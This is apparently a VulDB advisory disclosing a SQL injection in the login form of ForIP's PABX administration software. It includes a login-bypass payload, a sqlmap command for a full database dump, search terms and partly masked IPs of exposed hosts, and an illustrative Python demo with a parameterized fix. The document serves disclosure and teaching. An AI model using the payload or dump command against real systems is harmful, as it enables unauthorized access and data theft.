Title | For IP Tecnologia Ltda ForIP Tecnologia - Administração PABX 1.x SQL Injection |
---|
Description | A SQL injection vulnerability was found in the "usuario" parameter of the authentication form of the "ForIP Tecnologia - Administração PABX" application. The value passed in this parameter is not sanitized by the application's backend and is concatenated directly into the SQL query, which makes SQL injection possible. As a result, an attacker can close the original string literal and append a condition that always evaluates to true, such as the value: ' OR 1=1 -- , so that the WHERE clause matches every row and the application logs the attacker in as the first user returned by the database (typically the first account in the users table). Additionally, automated tools such as sqlmap can be used to perform a complete database dump.
By using Google it is possible to find vulnerable applications. Searching for "ForIP Tecnologia - Administração PABX" reveals a host with the application exposed to the internet at: "https://165.x.x.x/". Using other search terms, such as "LOGIN FORIP MANAGER", another exposed host can be found that also contains the vulnerability, at: "https://159.x.x.x/".
Using the sqlmap tool to perform a complete database dump:
sqlmap -u "https://{IP}:8443/login?usuario=admin&senha=123" --flush-session --ignore-code=401
All versions of the product are affected by the vulnerability.
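To make the mechanism concrete, the following is an added illustration, not code from the ForIP product or from the submitter. It reproduces the flaw described above against an in-memory SQLite database: the table name "usuarios", the column names "usuario" and "senha" and the sample rows are constructed assumptions derived from the parameter names on the login form, since the real schema is not known. The vulnerable login concatenates the input into the query, so the payload ' OR 1=1 -- collapses the WHERE clause to true and the first stored account is returned; the hardened variant binds the same input as a parameter and rejects it.

```python
import sqlite3

# Constructed stand-in for the PABX backend (assumed schema, not the real one).
# Passwords are stored in clear text here purely to keep the demo short;
# a real application must store a salted hash instead.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE usuarios (id INTEGER PRIMARY KEY, usuario TEXT, senha TEXT)"
    )
    conn.executemany(
        "INSERT INTO usuarios (usuario, senha) VALUES (?, ?)",
        [("admin", "S3cret!"), ("operador", "ramal42")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, usuario: str, senha: str):
    """Mirrors the flaw in the advisory: the form values are pasted into the
    SQL text, so a quote in 'usuario' changes the structure of the query.
    Returns the user name the application would treat as logged in, or None."""
    query = (
        "SELECT id, usuario FROM usuarios "
        f"WHERE usuario = '{usuario}' AND senha = '{senha}'"
    )
    row = conn.execute(query).fetchone()   # application takes the first row
    return row[1] if row else None


def login_fixed(conn: sqlite3.Connection, usuario: str, senha: str):
    """Hardened variant: the driver binds the values as data, so they can
    never be parsed as SQL whatever characters they contain."""
    row = conn.execute(
        "SELECT id, usuario FROM usuarios WHERE usuario = ? AND senha = ?",
        (usuario, senha),
    ).fetchone()
    return row[1] if row else None


# The payload from the advisory. The trailing space after "--" matters on
# MySQL-style comment syntax; SQLite accepts "--" with or without it.
PAYLOAD = "' OR 1=1 -- "


def demo() -> dict:
    """Runs the same credentials through both login paths and returns who,
    if anyone, each path would authenticate."""
    conn = build_db()
    return {
        "vuln_bypass": login_vulnerable(conn, PAYLOAD, "anything"),
        "vuln_valid": login_vulnerable(conn, "operador", "ramal42"),
        "fixed_bypass": login_fixed(conn, PAYLOAD, "anything"),
        "fixed_valid": login_fixed(conn, "operador", "ramal42"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Running the block prints that the vulnerable path authenticates the payload as "admin" (the first row in the table) while the parameterized path returns None for it; legitimate credentials work on both paths. The injected query the vulnerable path actually executes is SELECT id, usuario FROM usuarios WHERE usuario = '' OR 1=1 -- ' AND senha = 'anything', with the original password check commented out.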
|
---|
User | gabriel (UID 72007) |
---|
Submission | 07/17/2024 12:05 AM (11 months ago) |
---|
Moderation | 07/25/2024 11:53 AM (8 days later) |
---|
Status | Accepted |
---|
VulDB Entry | 272423 [ForIP Tecnologia Administração PABX 1.x Authentication Form /login usuario sql injection] |
---|
Points | 17 |
---|